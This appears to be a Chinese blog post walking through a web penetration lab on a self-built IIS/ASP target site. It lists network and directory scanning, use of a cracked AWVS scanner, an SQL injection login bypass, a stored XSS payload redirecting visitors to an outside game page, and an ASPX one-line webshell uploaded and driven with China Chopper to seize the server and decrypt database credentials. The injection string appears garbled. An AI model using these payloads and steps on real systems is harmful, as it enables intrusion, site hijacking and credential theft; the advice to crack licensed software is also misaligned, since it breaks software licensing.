1、首先需要关闭防火墙和一切杀毒软件,在cmd下进行.net环境安装,启动Internet Information Services可承载的web核心和Internet信息服务功能,从而将ISS web服务器完整安装,将ASP.NET状态服务启动。
2、将ASP软件压缩包,解压到一个目录,不要解压到桌面,因为会涉及权限问题,在网站下添加一个新的网站web,物理路径为刚刚下载的ASP软件的地址,IP地址为本机的IP地址,之后在设置修改一下网站版本(需要v4以上的版本),并且把32为兼容改为true,之后网站就可以浏览出来。
3、使用局域网探查工具LanSee对所属的局域网网段进行探查,打开端口扫描工具AdvancedPortScanner,输入主机IP,对目标主机进行扫描,有四个端口是打开的。
4、打开御剑后台扫描工具,对目标网址进行扫描,安装AWVS软件并且破解,利用web scanner功能扫描一个网站,观察扫描结果(包括漏洞告警、网站结构、cookies等信息),利用site crawler功能爬取网站的文件和目录。
5、使用御剑孤独后台扫描工具暴力搜索进入后台登录界面,在靶站中,输入'or 1 o1'可以绕过用户名密码进入后台网站,输入‘的话,会出现语法错误。提交代码:<script>window.location.href="http://d.mytanwan.com/h/26026.html"</script>,一点击在线留言就会弹到游戏界面。
6、新建文本文档,将文件后缀修改为aspx,书写内容如下:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>,在系统中寻找文件上传点。在网站上新增友情链接,上传之前创建的aspx木马文件。设法获得上传文件在网站目录中的文件名称和路径。利用中国菜刀工具连接一句话木马,密码为pass,脚本形式为aspx,添加后就连上了木马文件。获得目标服务器的操作权限并拿到数据库文件,之后对数据库中的账号密码进行解密。
扫一扫
802
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
